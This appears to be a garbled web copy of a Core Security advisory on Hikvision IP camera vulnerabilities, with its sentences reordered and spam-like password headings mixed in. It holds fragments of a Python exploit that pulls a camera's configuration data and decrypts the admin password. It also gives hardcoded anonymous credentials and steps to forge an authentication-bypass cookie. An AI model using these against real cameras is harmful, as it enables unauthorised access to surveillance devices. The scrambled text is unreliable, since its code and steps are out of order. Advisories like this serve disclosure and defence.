Request the URI a page that should not be accessed without authentication if the anonymous user is disabled.userInfo80), path / and value YW5vbnltb3VzOlwxNzdcMTc3XDE3N1wxNzdcMTc3XDE3Nw= this is the tuple user:pass encoded in base64 explained above. Use your preferred tool (for example Firebug on Firefox) to create a cookie with the name userInfoXX (replace XX with the port where the webserver is running i.e.Load the login page to generate the initial cookies of the camera's webapp.The bypass cannot be used directly through the login form but rather by forging a cookie: The camera has a built-in anonymous account intended for guest users, but even when the feature is disabled it could be bypassed due to the usage of hardcoded credentials: user: anonymous password: \177\177\177\177\177\177 Parser.add_argument('output', action = 'store', help = "filename to write the plaintext config")Īttack(options.target, ername, options.password, options.output)ħ.2. Parser.add_argument('password', action = 'store', help = "username's password") Parser.add_argument('username', action = 'store', help = 'username to be used to authenticate against target') Parser.add_argument('target', action = 'store', help = 'target host to attack') Print "If it doesn't make any sense, just do a strings of the output file"
HIKVISION IP CAMERA DEFAULT PASSWORD PASSWORD
Print 'Probably the admin user is %s and the password is %s' % (user, pwd) Req = urllib2.Request(base_url, None, headers) Plaintext += chr(ord(config) ^ ord(key))ĭef attack(target, username, password, output):īase_url = ' + target + '/PSIA/System/ConfigurationData' # Important: We're assuming the last 4 bytes of the file's plaintext are A valid user account is needed to launch the attack. The following script allows obtaining the administrator password by requesting the camera's configuration data and breaking its trivial encryption. Privilege Escalation through ConfigurationData Request
HIKVISION IP CAMERA DEFAULT PASSWORD CODE
Technical Description / Proof of Concept Code 7.1. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.ħ.Analysis and research by Anibal Sacco and Federico Muttis from Core Exploit Writers Team. was discovered and researched by Alejandro Rodriguez from Core Exploit QA Team.was discovered and researched by Alberto Solino from Core Security.Have at least one proxy filtering the Range parameter in RTSP requests.Have at least one proxy filtering HTTP requests to /PSIA/System/ConfigurationData.Do not expose the camera to internet unless absolutely necessary.There was no official answer from Hikvision after several attempts (see ) contact vendor for further information. Vendor Information, Solutions and Workarounds Other devices based on the same firmware are probably affected too, but they were not checked.ĥ.To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP packet handler.To bypass the anonymous user authentication using hard-coded credentials (even if the built-in anonymous user account was explicitly disabled).To obtain the admin password from a non-privileged user account.Multiple vulnerabilities have been found in Hikvision IP camera DS-2CD7153-E (and potentially other cameras sharing the affected firmware ) that could allow a remote attacker:
Vulnerability InformationĬlass: Input validation error, Use of Hard-coded Credentials, Buffer overflow ĬVE Name: CVE-2013-4975, CVE-2013-4976, CVE-2013-4977 3. Title: Hikvision IP Cameras Multiple Vulnerabilities
0 kommentar(er)
